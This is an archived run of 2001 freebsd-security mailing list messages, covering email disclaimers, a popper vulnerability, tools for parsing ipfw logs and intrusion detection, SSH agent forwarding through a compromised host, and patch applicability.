-0700 (PDT) From: Arnim Sauerbier Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd) To: "Karsten W. Rohrbach" Cc: security@freebsd.org In-Reply-To: <20010601202813.H10477@mail.webmonster.de> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > ooh. i forgot. wasn't this sent to a mailing list? *grin* > i hope nobody sues me for replying to it in public... nevermind ;-) Karsten, I couldn't agree more. Is the world so lawyer-infested that we need to blat such ugly .sigs (below) to everything we write? I wonder what legal scars a person carries to make him/her feel the need for such disclaimers. I feel like I'm reading the text of a dog that's been beaten with a legal stick. I'm seeing more and more of this in private emails, and it just puts a sick, sad feeling in my stomach. What happened to the people who understand that "information wants to be free"? Sorry to not post anything more constructive. Just venting. Thanks to all the smart folks here for the SSH/PKI education (and humblification, I'm still digesting it). You can copy and distribute this message in any way you want. There, I said it. I feel better. arnim > > The information contained in this e-mail message is confidential, > > intended only for the use of the individual or entity named above. If > > the reader of this e-mail is not the intended recipient, or the employee > > or agent responsible to deliver it to the intended recipient, you are > > hereby notified that any review, dissemination, distribution or copying > > of this communication is strictly prohibited. If you have received this > > e-mail in error, please contact postmaster@globalstar.com ===== _\\\/ __ _ = ..' Arnim Sauerbier, /_/ (_)__ __ ____ __ C \) ugly sack of /_/__/_/ _ \/_//_/|_\/_/ ... the choice of \ - mostly water /____/_/_//_/\_,_//_/\_| a GNU generation __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail - only $35 a year! http://personal.mail.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 12:59:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id E8E8237B407 for ; Mon, 4 Jun 2001 12:59:08 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f54K04g81811; Mon, 4 Jun 2001 16:00:04 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Mon, 4 Jun 2001 16:00:00 -0400 (EDT) From: Rob Simmons To: Arnim Sauerbier Cc: "Karsten W. Rohrbach" , security@FreeBSD.ORG Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd) In-Reply-To: <20010604194220.93548.qmail@web11807.mail.yahoo.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Maybe add an X-Copyright: line to your header. Less messy with the same effect? IANAL Robert Simmons Systems Administrator http://www.wlcg.com/ On Mon, 4 Jun 2001, Arnim Sauerbier wrote: > > ooh. i forgot. wasn't this sent to a mailing list? *grin* > > i hope nobody sues me for replying to it in public... nevermind ;-) > > Karsten, I couldn't agree more. > > Is the world so lawyer-infested that we need to blat such ugly .sigs (below) to everything we > write? I wonder what legal scars a person carries to make him/her feel the need for such > disclaimers. I feel like I'm reading the text of a dog that's been beaten with a legal stick. > > I'm seeing more and more of this in private emails, and it just puts a sick, sad feeling in my > stomach. What happened to the people who understand that "information wants to be free"? > > Sorry to not post anything more constructive. Just venting. Thanks to all the smart folks here > for the SSH/PKI education (and humblification, I'm still digesting it). > > You can copy and distribute this message in any way you want. There, I said it. I feel better. > > arnim > > > > The information contained in this e-mail message is confidential, > > > intended only for the use of the individual or entity named above. If > > > the reader of this e-mail is not the intended recipient, or the employee > > > or agent responsible to deliver it to the intended recipient, you are > > > hereby notified that any review, dissemination, distribution or copying > > > of this communication is strictly prohibited. If you have received this > > > e-mail in error, please contact postmaster@globalstar.com > > > > ===== > _\\\/ __ _ > = ..' Arnim Sauerbier, /_/ (_)__ __ ____ __ > C \) ugly sack of /_/__/_/ _ \/_//_/|_\/_/ ... the choice of > \ - mostly water /____/_/_//_/\_,_//_/\_| a GNU generation > > __________________________________________________ > Do You Yahoo!? > Get personalized email addresses from Yahoo! Mail - only $35 > a year! http://personal.mail.yahoo.com/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7G+jEv8Bofna59hYRA/HmAKCPSuETIN/SX4yQjM6fryqgQTQW1wCgmehm i/vfGP06xshuoZyxUJu8Ixw= =8DKl -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 13: 3:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id 5EEFE37B406 for ; Mon, 4 Jun 2001 13:03:08 -0700 (PDT) (envelope-from christopher@schulte.org) Received: from schulte-laptop.schulte.org (nb40.netbriefings.com [64.183.199.40]) by poontang.schulte.org (8.12.0.Beta7/8.12.0.Beta7) with ESMTP id f54K2rab060183; Mon, 4 Jun 2001 15:02:54 -0500 (CDT) Message-Id: <5.1.0.14.0.20010604145906.026902f8@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Mon, 04 Jun 2001 15:01:41 -0500 To: Rob Simmons , Arnim Sauerbier From: Christopher Schulte Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd) Cc: "Karsten W. Rohrbach" , security@FreeBSD.ORG In-Reply-To: References: <20010604194220.93548.qmail@web11807.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 04:00 PM 6/4/2001 -0400, Rob Simmons wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: RIPEMD160 > >Maybe add an X-Copyright: line to your header. Less messy with the same >effect? IANAL Nope, many clients hide those types of headers by default. Is it the end user's job to scour every header of every email? Unlikely. >Robert Simmons >Systems Administrator >http://www.wlcg.com/ --chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 13:17:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from NOC.maKintosh.com (maKintosh.com [208.188.197.97]) by hub.freebsd.org (Postfix) with ESMTP id 4427F37B401 for ; Mon, 4 Jun 2001 13:17:30 -0700 (PDT) (envelope-from co0kie@maKintosh.com) Received: by NOC.maKintosh.com (Postfix, from userid 1005) id 7CCB3104B; Mon, 4 Jun 2001 15:12:45 -0500 (CDT) Date: Mon, 4 Jun 2001 15:12:45 -0500 From: co0kie bawx To: security@FreeBSD.ORG Subject: Re: (Originially): Apache Software Foundation Server compromised, resecured. Message-ID: <20010604151245.A15758@NOC.maKintosh.com> References: <20010604194220.93548.qmail@web11807.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from rsimmons@wlcg.com on Mon, Jun 04, 2001 at 04:00:00PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Speaking of messy.. Maybe change thread Subjects once the actual(originating) subject changes. I wonder where people get the time to worry about silly little things, like others signatures and disclaimers. <: /co0kie On Mon, Jun 04, 2001 at 04:00:00PM -0400, Rob Simmons wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: RIPEMD160 > > Maybe add an X-Copyright: line to your header. Less messy with the same > effect? IANAL To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 14:55:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-243.dsl.lsan03.pacbell.net [64.165.226.243]) by hub.freebsd.org (Postfix) with ESMTP id 9BA6537B401 for ; Mon, 4 Jun 2001 14:55:40 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id D4511673A5; Mon, 4 Jun 2001 14:55:39 -0700 (PDT) Date: Mon, 4 Jun 2001 14:55:39 -0700 From: Kris Kennaway To: "Nickolay A. Kritsky" Cc: security@FreeBSD.ORG Subject: Re: FYI Message-ID: <20010604145539.A72908@xor.obsecurity.org> References: <056701c0ece9$0308d720$0600a8c0@ibmka.internethelp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <056701c0ece9$0308d720$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Mon, Jun 04, 2001 at 03:25:03PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 04, 2001 at 03:25:03PM +0400, Nickolay A. Kritsky wrote: > Does it mean, that popper supplied with FreeBSD 3.3 (/usr/local/libexec/popper) is vulnerable too? Erm, yes. I bet that's got other problems too for which we released advisories a long time ago. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 15:37:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 59DB137B403 for ; Mon, 4 Jun 2001 15:37:39 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id AAA75688; Tue, 5 Jun 2001 00:37:34 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Brian Behlendorf Cc: "Karsten W. Rohrbach" , Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd) References: From: Dag-Erling Smorgrav Date: 05 Jun 2001 00:37:33 +0200 In-Reply-To: Message-ID: Lines: 12 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brian Behlendorf writes: > On 1 Jun 2001, Dag-Erling Smorgrav wrote: > > Oh, and .252 does have reverse DNS: > OK, but it wasn't recorded in my wtmp, so I suspect it might not get > recorded in others'. No, because it's too long, so the IP is recorded insted (to avoid ambiguities) DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 1:24:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from Exchange2000.com-con.ag (exchange2000.com-con.net [212.6.164.8]) by hub.freebsd.org (Postfix) with ESMTP id D665537B401 for ; Tue, 5 Jun 2001 01:24:46 -0700 (PDT) (envelope-from rh@com-con.net) Content-Class: urn:content-classes:message Subject: security log file parser / ids MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Tue, 5 Jun 2001 10:24:42 +0100 X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: security log file parser / ids Thread-Index: AcDtoVoNIzbBRx6KQpGCdqF8vL9w9w== From: "Heimes, Rene" To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hiho! i am searching for a parser that parses security logs from ipfw-made up logs. anyone got a hint? (btw: what about ipfw firewalls - outdated? what would be better? ipchains? help!) other question - whats the (freeware) ids of your choice / "state of the art" for freeBSD? great thanks in advance, ren=E9 **************************************************** "who fights might loose - who does not fight has lost immediately" Bertolt Brecht (freely adapted ;-) **************************************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 1:31: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 1B57237B403 for ; Tue, 5 Jun 2001 01:30:55 -0700 (PDT) (envelope-from on@cs.ait.ac.th) Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f558m9B00684; Tue, 5 Jun 2001 15:48:09 +0700 (ICT) Received: (from on@localhost) by banyan.cs.ait.ac.th (8.8.5/8.8.5) id PAA21823; Tue, 5 Jun 2001 15:30:48 +0700 (ICT) Date: Tue, 5 Jun 2001 15:30:48 +0700 (ICT) Message-Id: <200106050830.PAA21823@banyan.cs.ait.ac.th> X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f From: Olivier Nicole To: rh@com-con.net Cc: freebsd-security@FreeBSD.ORG In-reply-to: (rh@com-con.net) Subject: Re: security log file parser / ids References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org René, >i am searching for a parser that parses security logs from ipfw-made up >logs. anyone got a hint? Do you mean output to syslog? I'd suggest swatch (http://www.cert.org/security-improvement/implementations/i042.01.html) but did not test it myself (one of my many project for when I have some time, maybe next century :) Regards, olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 2:28:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (diskworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 35E2F37B405 for ; Tue, 5 Jun 2001 02:28:37 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 714 invoked by uid 1000); 5 Jun 2001 09:27:26 -0000 Date: Tue, 5 Jun 2001 12:27:26 +0300 From: Peter Pentchev To: "Heimes, Rene" Cc: freebsd-security@freebsd.org Subject: Re: security log file parser / ids Message-ID: <20010605122726.A665@ringworld.oblivion.bg> Mail-Followup-To: "Heimes, Rene" , freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rh@com-con.net on Tue, Jun 05, 2001 at 10:24:42AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 05, 2001 at 10:24:42AM +0100, Heimes, Rene wrote: > hiho! > > i am searching for a parser that parses security logs from ipfw-made up > logs. anyone got a hint? > (btw: what about ipfw firewalls - outdated? what would be better? > ipchains? help!) Is there any reason to consider ipfw outdated? Or are you just asking if it is? In that case, IMHO, no, it isn't. G'luck, Peter -- This sentence every third, but it still comprehensible. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 7:23:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from d170h113.resnet.uconn.edu (d170h113.resnet.uconn.edu [137.99.170.113]) by hub.freebsd.org (Postfix) with SMTP id 2DB0B37B401 for ; Tue, 5 Jun 2001 07:23:09 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 25963 invoked by alias); 5 Jun 2001 14:23:32 -0000 Received: from unknown (HELO moobert) (137.99.170.140) by d170h113.resnet.uconn.edu with SMTP; 5 Jun 2001 14:23:32 -0000 Message-ID: <003d01c0edcb$702fd1e0$8caa6389@resnet.uconn.edu> From: "Peter C. Lai" To: References: <20010604194220.93548.qmail@web11807.mail.yahoo.com> <20010604151245.A15758@NOC.maKintosh.com> Subject: Re: (Originially): Apache Software Foundation Server compromised, resecured. Date: Tue, 5 Jun 2001 10:25:57 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The truth is, that many companies and private organizations actually do filter all mail not just for viruses but many do it for "non-work-related" activities, because they feel that one shouldn't use company bandwidth to send "personal" email. Recently I knew someone who received a company reprimand about using email for personal use even though such a "restriction" was not even in the company policy, and he was sending his mails off company time. Furthermore, we know that e-mail is probably less secure than even a phone call or snail-mail (at least in the non-underground "normal" world). The chance that a piece of suggestive email may fall "into the wrong hands" is high. If you remember some incriminating cell phone call made by Newt Gingrich that was intercepted by some layperson ended up as one of the scandals of 1997 or something. At the same time, because e-mail is a very effective asynchronous mode of communication, it is easier to send private or confidential messages as opposed to phone messages or fax. (e.g. You probably wouldn't want confidential faxes floating around the office, and most offices have one or two fax machines per department.) The disclaimer at least offers a warning, if not actual defense against unauthorized (mostly unintentional) activities. This is kind of like the EULA on closed-source software, which most people blatantly ignore, but it's still there and gives the SPA at least some authority in the matter. Peter C. Lai | University of Connecticut peter.lai@uconn.edu Dept. of Residential Life | Programmer College of Liberal Arts & Sciences | Dept. of Molecular & Cell Biology | Undergraduate Research Assistant ----- Original Message ----- From: "co0kie bawx" To: Sent: Monday, June 04, 2001 4:12 PM Subject: Re: (Originially): Apache Software Foundation Server compromised, resecured. > Speaking of messy.. Maybe change thread Subjects once the actual(originating) subject changes. I wonder where people get the time to worry about silly little things, like others signatures and disclaimers. > <: > /co0kie > > On Mon, Jun 04, 2001 at 04:00:00PM -0400, Rob Simmons wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: RIPEMD160 > > > > Maybe add an X-Copyright: line to your header. Less messy with the same > > effect? IANAL > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 8:22:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.fdma.com (mail.fdma.com [216.241.67.73]) by hub.freebsd.org (Postfix) with ESMTP id 37F9937B401 for ; Tue, 5 Jun 2001 08:22:14 -0700 (PDT) (envelope-from scheidell@fdma.com) Received: from MIKELT (mikelt.fdma.lan [10.1.1.40]) by mail.fdma.com (8.11.3/8.11.3) with SMTP id f55FM3P05600 for ; Tue, 5 Jun 2001 11:22:03 -0400 (EDT) Message-ID: <007b01c0edd3$45ebaf50$2801010a@fdma.com> From: "Michael Scheidell" To: References: Subject: Re: security log file parser / ids Date: Tue, 5 Jun 2001 11:22:02 -0400 Organization: Florida Datamation, Inc. MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ""Heimes, Rene"" wrote in message news:F54B610C5BFDE546BBA2F6CC595ACC75084958@Exchange2000.com-con.ag... > hiho! > > i am searching for a parser that parses security logs from ipfw-made up > logs. anyone got a hint? > (btw: what about ipfw firewalls - outdated? what would be better? > ipchains? help!) Depends on what you want to do with it. I do a 'tail -3 /var/log/ipfw.log' every morning,just to see anything interesting I also use the perl agent for Mynetwatchman. It watches ipfw, cisco ios, and specific stuff I pass it from tcpwrapper and sends it to www.mynetwatchman.com (they autolart the isp on certain events, like lion/cheeze worm scans, rpc scans, or if they detect the same scaning ip from several different locations) I then go to their site, select 'attacks reported today' and see if they are just hitting my site, or its a generic script scanner. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 8:27:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from c1456354-a.boise1.id.home.com (c1456354-a.boise1.id.home.com [65.4.107.53]) by hub.freebsd.org (Postfix) with SMTP id 5984737B405 for ; Tue, 5 Jun 2001 08:27:23 -0700 (PDT) (envelope-from g0rdi@c1456354-a.boise1.id.home.com) Received: (qmail 995 invoked by uid 500); 5 Jun 2001 15:25:52 -0000 Date: Tue, 5 Jun 2001 09:25:52 -0600 From: jeremy-novak To: "Heimes, Rene" Cc: freebsd-security@freebsd.org Subject: Re: security log file parser / ids Message-ID: <20010605092552.A936@c1456354-a.boise1.id.home.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: ; from rh@com-con.net on Tue, Jun 05, 2001 at 10:24:42AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 05, 2001 at 10:24:42AM +0100, Heimes, Rene wrote: > hiho! > > i am searching for a parser that parses security logs from ipfw-made up > logs. anyone got a hint? > (btw: what about ipfw firewalls - outdated? what would be better? > ipchains? help!) > > other question - whats the (freeware) ids of your choice / "state of the > art" for freeBSD? > > great thanks in advance, > > rené > > **************************************************** > "who fights might loose - who does not fight has lost immediately" > Bertolt Brecht (freely adapted ;-) > **************************************************** Hi I hope this helps some. It is a neat little toy called logcheck that is very configurable. You can get it at http://www.psionic.com Hope that helps out. Jeremy -- ^ ^ email: pr0cy0n@home.com (but you already knew that) [ 0 0 ] ircnick: g0rdi , ' usenet/mail: comp.unix.bsd.freebsd.misc/freebsd-hackers, lots more o root password: just kidding! "You have an account at host.com"? "I wanna be user@host.com; I would get so many 'cool' e-mails". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 10:45: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from f-control.area51.dk (f-control.area51.dk [213.237.108.10]) by hub.freebsd.org (Postfix) with SMTP id 2E00B37B406 for ; Tue, 5 Jun 2001 10:45:03 -0700 (PDT) (envelope-from a@f-control.area51.dk) Received: (qmail 98421 invoked by uid 1007); 5 Jun 2001 17:45:14 -0000 Date: Tue, 5 Jun 2001 19:45:14 +0200 From: Alex Holst To: freebsd-security@FreeBSD.ORG Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd) Message-ID: <20010605194514.B98233@area51.dk> Mail-Followup-To: Alex Holst , freebsd-security@FreeBSD.ORG References: <3B16E7D9.3E9B78FF@globalstar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B16E7D9.3E9B78FF@globalstar.com>; from crist.clark@globalstar.com on Thu, May 31, 2001 at 05:54:49PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Quoting Crist Clark (crist.clark@globalstar.com): > You cannot 'record passphrases.' RSA authentication uses public key > cryptography. Exactly. However, consider the three machines in the scenario below: workstation ---> compromised middle machine ---> server I have been thinking about the least risk approach. If the middle machine has ssh and sshd trojaned to various degrees, would one not benefit from using authentication forwarding rather than typing one's passphrase to the ssh client on the compromised machine? If one does lose his passphrase and the trojaned ssh captured the response it still wouldn't do an intruder much good, would it? -- I prefer the dark of the night, after midnight and before four-thirty, when it's more bare, more hollow. http://a.area51.dk/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 10:50: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from magnetar.blackhatnetworks.com (magnetar.blackhatnetworks.com [65.166.202.3]) by hub.freebsd.org (Postfix) with ESMTP id 0E62337B403 for ; Tue, 5 Jun 2001 10:50:04 -0700 (PDT) (envelope-from alex@bsdfreak.org) Received: from localhost (alex@localhost.blackhatnetworks.com [127.0.0.1]) by magnetar.blackhatnetworks.com (8.x/8.x) with ESMTP id f55Hnwt20598; Tue, 5 Jun 2001 13:49:58 -0400 (EDT) Date: Tue, 5 Jun 2001 13:49:58 -0400 (EDT) From: Alex X-X-Sender: To: Alex Holst Cc: Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd) In-Reply-To: <20010605194514.B98233@area51.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Quoting Crist Clark (crist.clark@globalstar.com): > > You cannot 'record passphrases.' RSA authentication uses public key > > cryptography. > > Exactly. However, consider the three machines in the scenario below: > > workstation ---> compromised middle machine ---> server > > I have been thinking about the least risk approach. If the middle machine > has ssh and sshd trojaned to various degrees, would one not benefit from > using authentication forwarding rather than typing one's passphrase to the > ssh client on the compromised machine? This is a perfect scenario for the attack to perform a man-in-the-middle attack, passive SSH analysis, or a brute force attempt at the cryptographic integrity of the connection. -Alex > > If one does lose his passphrase and the trojaned ssh captured the response > it still wouldn't do an intruder much good, would it? > > -- > I prefer the dark of the night, after midnight and before four-thirty, > when it's more bare, more hollow. http://a.area51.dk/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 12: 4: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id 2929537B401 for ; Tue, 5 Jun 2001 12:04:01 -0700 (PDT) (envelope-from christopher@schulte.org) Received: from schulte-laptop.schulte.org (nb40.netbriefings.com [64.183.199.40]) by poontang.schulte.org (8.12.0.Beta7/8.12.0.Beta7) with ESMTP id f55J3wab009352 for ; Tue, 5 Jun 2001 14:03:59 -0500 (CDT) Message-Id: <5.1.0.14.0.20010605135437.0278eeb0@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 05 Jun 2001 14:02:45 -0500 To: security@FreeBSD.ORG From: Christopher Schulte Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts In-Reply-To: <200106051808.f55I8ik15444@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:08 AM 6/5/2001 -0700, you wrote: >This patch has been verified to apply to FreeBSD 4.3-RELEASE and >4.2-RELEASE; it may or may not apply to older, unsupported versions of >FreeBSD. Can someone comment on the impact of applying this patch to a 4.2-STABLE environment? One might assume since 4.2-S falls between 4.2-R and 4.3-R, it would work? FreeBSD 4.2-STABLE FreeBSD 4.2-STABLE #1: Sat Jan 6 19:43:53 CST 2001 Thanks, --chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 13: 6:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from mta5.rcsntx.swbell.net (mta5.rcsntx.swbell.net [151.164.30.29]) by hub.freebsd.org (Postfix) with ESMTP id C73B937B401 for ; Tue, 5 Jun 2001 13:06:38 -0700 (PDT) (envelope-from ryanpek@swbell.net) Received: from mhx800 ([64.219.216.69]) by mta5.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GEH00IID0BS9E@mta5.rcsntx.swbell.net> for freebsd-security@freebsd.org; Tue, 5 Jun 2001 13:50:16 -0500 (CDT) Date: Tue, 05 Jun 2001 13:50:08 -0500 From: Ryan Subject: Re: security log file parser / ids To: "Heimes, Rene" , freebsd-security@freebsd.org Message-id: <001301c0edf0$58b49ee0$01000001@mhx800> MIME-version: 1.0 X-Mailer: Microsoft Outlook Express 5.50.4522.1200 Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 References: X-Priority: 3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: 